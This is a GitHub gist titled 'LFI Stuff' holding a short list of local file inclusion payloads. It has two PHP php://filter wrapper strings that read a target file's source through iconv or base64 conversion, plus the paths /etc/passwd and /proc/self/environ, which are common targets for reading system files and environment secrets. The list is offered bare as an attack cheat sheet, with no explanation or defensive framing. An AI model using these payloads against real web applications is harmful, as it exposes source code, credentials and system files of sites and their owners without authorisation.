Created
August 4, 2020 20:56
-
-
Save xputerax/3dac683c4477538006fd0726fa3504d5 to your computer and use it in GitHub Desktop.
LFI Stuff
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
php://filter/convert.iconv.utf-8.utf-16/resource=$FILE | |
php://filter/convert.base64-encode/resource=$FILE | |
/etc/passwd | |
/proc/self/environ |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment